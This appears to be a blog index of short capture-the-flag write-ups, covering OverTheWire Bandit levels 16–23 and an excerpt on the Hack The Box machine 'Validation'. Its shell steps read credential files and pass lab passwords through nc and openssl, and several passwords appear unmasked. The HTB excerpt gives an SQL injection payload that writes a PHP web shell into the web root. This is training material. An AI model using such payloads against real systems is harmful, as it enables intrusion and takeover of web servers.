Pages

Search

Bandit CTF – Level 23

Level 22 -> 23 bandit22@bandit:~$ cd /etc/cron.dbandit22@bandit:/etc/cron.d$ ls bandit22@bandit:/etc/cron.d$ cat cronjob_bandit23 bandit22@bandit:/etc/cron.d$ cat /usr/bin/cronjob_bandit23.sh bandit22@bandit:/etc/cron.d$ whoami bandit22@bandit:/etc/cron.d$ echo I am user bandit23 | md5sum | cut -d ‘ ‘ -f 1 bandit22@bandit:/etc/cron.d$ cat /tmp/8ca319486bfbbc3663ea0fbe81326349 password = jc1uXXXXXXXXXXXXXXXXXXXXXXXXXXXX

Bandit CTF – Level 22

Level 21 -> 22 bandit21@bandit:/etc/cron.d$ ls bandit21@bandit:/etc/cron.d$ cat cronjob_bandit22 bandit21@bandit:/etc/cron.d$ cat /usr/bin/cronjob_bandit22.sh bandit21@bandit:/tmp$ cat /tmp/t7O6lds9S0RqQh9aMcz6ShpAoZKF7fgv Password = Yk7oXXXXXXXXXXXXXXXXXXXXXXXXXXXX

Bandit CTF – Level 21

level 20 -> 21 bandit20@bandit:~$ ./suconnect bandit20@bandit:~$ echo «GbKksEFF4yrVs6il55v6gwY5aVje5f0j» | nc -l localhost -p 8080 From other session: bandit20@bandit:~$ ./suconnect 8080 Password = gE269g2h3mw3pwgrj0Ha9Uoqen1c9DGr

Bandit CTF – Level 20

Level 19 ->20 bandit19@bandit:~$ ls -la bandit19@bandit:~$ ./bandit20-do bandit19@bandit:~$ ./bandit20-do cat /etc/bandit_pass/bandit20 Password = GbKkXXXXXXXXXXXXXXXXXXXXXXXXXXXX

Bandit CTF – Level 19

Level 18 -> 19 $ man ssh $ ssh bandit18@bandit.labs.overthewire.org -p 2220 -t «ls -la» $ ssh bandit18@bandit.labs.overthewire.org -p 2220 -t «cat ~/readme» Password = IuekXXXXXXXXXXXXXXXXXXXXXXXXXXXX

Bandit CTF – Level 18

Level 17 –> 18 $ssh -i bandit17.key bandit17@bandit.labs.overthewire.org -p 2220 bandit17@bandit:~$ diff passwords.new passwords.old password = kfBfXXXXXXXXXXXXXXXXXXXXXXXXXXXX

Bandit CTF – Level 17

Level 16 –> 17 bandit16@bandit:~$ echo «cluFn7wTiGryunymYOu4RcffSxQluehd» | openssl s_client -connect localhost:31790 -ign_eof Now we can save the private key as bandit17.key

How to improve our TTY

Once we get a reverse shell we usually need to improve the TTY. Here is some tip to do it:

HTB Validation

$ nmap -p- -v 10.10.11.116 Access to http://10.10.11.116 The listbox values are sent to the server into a POST request: username=rffuste&country=Brazil In the response, we get a cookie user This user cookie does not change if multiple requests are performed. SQL Injection We can check if there is an SQL Injection. We have confirmed there is an SQL Injection that we can use. ‘ union select «» INTO OUTFILE ‘/var/www/html/shell.php’– – Now

Bandit CTF Level 16

Level 15 –> 16 bandit15@bandit:~$ echo «BfMYroe26WYalil77FoDi9qh59eK5xNr» | openssl s_client -connect localhost:30001 -ign_eof password = cluFXXXXXXXXXXXXXXXXXXXXXXXXXXXX